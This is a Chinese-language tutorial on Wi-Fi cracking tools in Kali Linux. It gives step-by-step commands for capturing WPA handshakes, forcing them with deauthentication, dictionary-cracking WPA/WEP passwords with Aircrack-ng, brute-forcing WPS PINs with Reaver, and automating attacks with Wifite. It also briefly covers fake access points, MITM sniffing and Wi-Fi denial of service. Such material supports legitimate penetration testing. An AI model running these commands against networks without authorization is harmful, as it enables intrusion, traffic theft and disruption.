wifi 相关的工具
Aircrack-ng
- Aircrack-ng 是一个强大的 Wi-Fi 网络破解工具,广泛用于渗透测试和无线网络安全评估。它支持对 WEP 和 WPA/WPA2 网络进行密码破解,主要通过分析数据包和进行字典攻击
安装
- 在 Kali Linux 中,Aircrack-ng 通常是预安装的。如果没有安装,可以通过以下命令进行安装:
sudo apt update
sudo apt install aircrack-ng
启用无线网卡的监控模式
sudo airmon-ng
- 启动监控模式(假设你的无线网卡是 wlan0),这会启用监控模式,并将网卡重命名为 wlan0mon
sudo airmon-ng start wlan0
扫描 Wi-Fi 网络
- 使用 airodump-ng 扫描附近的 Wi-Fi 网络,获取网络的 BSSID 和信道等信息
- BSSID 是目标网络的唯一标识符
- 信道(channel)是目标网络运行的频道
sudo airodump-ng wlan0mon
捕获数据包
- 使用 airodump-ng 对特定网络进行定向扫描,捕获握手,语法如下:
- 是目标网络的 BSSID
- 是目标网络的信道
- 是你保存数据包的文件名(如:capture)
sudo airodump-ng --bssid <BSSID> -c <channel> -w <output_file> wlan0mon
sudo airodump-ng --bssid 00:14:22:01:23:45 -c 6 -w capture wlan0mon
- 这会开始抓取数据包,并将其保存到指定文件,在 airodump-ng 的界面上,看到“WPA handshake: ”的提示,表示握手已成功捕获,并生成一个 .cap 文件
捕获 WPA 握手
- 为了破解 WPA/WPA2 密码,你需要捕获一个 WPA 握手(WPA handshake)
- 通过使用 Aireplay-ng 来进行 deauthentication 攻击,让客户端断开并重新连接,这样可以强制它重新发送握手包
- –deauth 10:发送 10 个去认证包(deauth)
- -a:指定目标 AP 的 BSSID
- -c:指定客户端的 MAC 地址(可选,如果你知道客户端的 MAC 地址)
- wlan0mon:监控模式的接口
- 这会使目标客户端断开连接并重新连接,从而捕获握手数据
sudo aireplay-ng --deauth 10 -a 00:14:22:01:23:45 -c <client_mac> wlan0mon
破解 WPA/WPA2 密码
- 捕获到 WPA 握手数据后,文件名为 capture-01.cap,并且字典文件(如 rockyou.txt),使用以下命令进行字典攻击
- capture-01.cap:捕获的握手文件
- -w /path/to/wordlist.txt:指定字典文件的路径
sudo aircrack-ng capture-01.cap -w /path/to/wordlist.txt
破解 WEP 密码
- WEP 网络的破解过程与 WPA/WPA2 略有不同。首先,需要通过 airodump-ng 捕获足够的数据包。然后,使用 aircrack-ng 进行破解。
- aircrack-ng 会自动尝试破解 WEP 密码。如果捕获的数据包足够,它将很快给出密码
sudo aircrack-ng capture-01.cap
Reaver
- 专门用于破解 WPS(Wi-Fi Protected Setup) PIN 的工具
安装
sudo apt update
sudo apt install reaver
启用监控模式
sudo airmon-ng
sudo airmon-ng start wlan0
扫描目标网络
sudo airodump-ng wlan0mon
使用 Reaver 攻击 WPS PIN
sudo reaver -i wlan0mon -b <BSSID> -c <channel> -vv
- 其中:
- 是目标网络的 BSSID
- 是目标网络的信道
- -vv 启用详细输出,帮助你查看攻击过程
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
- 如果破解成功,Reaver 会显示正确的 WPS PIN,并通过 WPS PIN 计算出 Wi-Fi 网络的密码
Wifite
- 一个自动化的 Wi-Fi 渗透测试工具,基于 Aircrack-ng 和 Reaver,能够自动化常见的 Wi-Fi 攻击
安装 Wifite
sudo apt update
sudo apt install wifite
使用 Wifite 进行 Wi-Fi 渗透测试
sudo airmon-ng start wlan0
- 启动 Wifite,此命令会扫描附近的无线网络并列出所有的网络
sudo wifite
选择攻击目标
- Wifite 会自动列出附近的网络,包含 WPA/WPA2 或 WEP 网络。你可以根据目标网络的 BSSID(网络的唯一标识符)来选择攻击对象
执行攻击
- 一旦你选择了目标网络,Wifite 会开始自动化渗透测试
字典攻击(针对 WPA/WPA2)
- 当 Wifite 捕获到 WPA 握手后,它会尝试使用字典攻击来猜测密码。你可以提供自己的字典文件,也可以使用 Kali 中自带的字典
sudo wifite -dict /path/to/wordlist.txt
- 常见参数:
- -h:显示帮助信息。
- -p:仅执行 WEP 密码攻击。
- -w:指定 WPA 密码破解使用的字典文件。
- -c:指定特定的频道进行扫描。
- -p:仅选择 WEP 网络进行攻击。
sudo wifite -p -c 6 -dict /usr/share/wordlists/rockyou.txt
Fluxion
- 功能:它通过社会工程学攻击,诱使用户连接到伪造的接入点(AP),并获取 Wi-Fi 密码。
- 用途:创建一个伪造的 Wi-Fi 网络,捕捉目标的 WPA 密码。
- 命令示例:fluxion
Kismet
- 功能:是一个无线网络探测工具,可以嗅探和分析 Wi-Fi 网络。
- 用途:捕捉、分析并显示周围的所有无线网络。
- 命令示例:kismet
Ettercap
- 功能:一个网络嗅探和中间人攻击(MITM)工具,也可以用于 Wi-Fi 网络。
- 用途:捕获 Wi-Fi 网络流量,执行中间人攻击来窃取数据。
- 命令示例:ettercap -T -q -i wlan0
Airgeddon
- 功能:一个多功能的无线渗透测试工具,它结合了多个攻击技术,如字典攻击、强制嗅探、MITM 攻击等。
- 用途:可用于攻击 WPA/WPA2 网络、创建伪造接入点等。
- 命令示例:airgeddon
Eaphammer
- 功能:一种专门用于针对企业无线网络(EAPOL 协议)进行攻击的工具。
- 用途:对使用 EAP(如 WPA2-Enterprise)保护的网络进行攻击。
- 命令示例:eaphammer
Mdk3
- 功能:一个用于攻击 Wi-Fi 网络的工具,支持拒绝服务攻击(DoS)、网络干扰等。
- 用途:对 Wi-Fi 网络进行拒绝服务攻击,干扰合法的无线连接。
- 命令示例:mdk3 wlan0 d
Wireshark
- 功能:虽然它不仅限于 Wi-Fi 网络,但 Wireshark 是一款强大的网络协议分析工具,可以用来捕获和分析 Wi-Fi 网络流量。
- 用途:抓包并分析无线网络上的数据包。
- 命令示例:启动 Wireshark GUI 后,选择无线接口进行捕捉。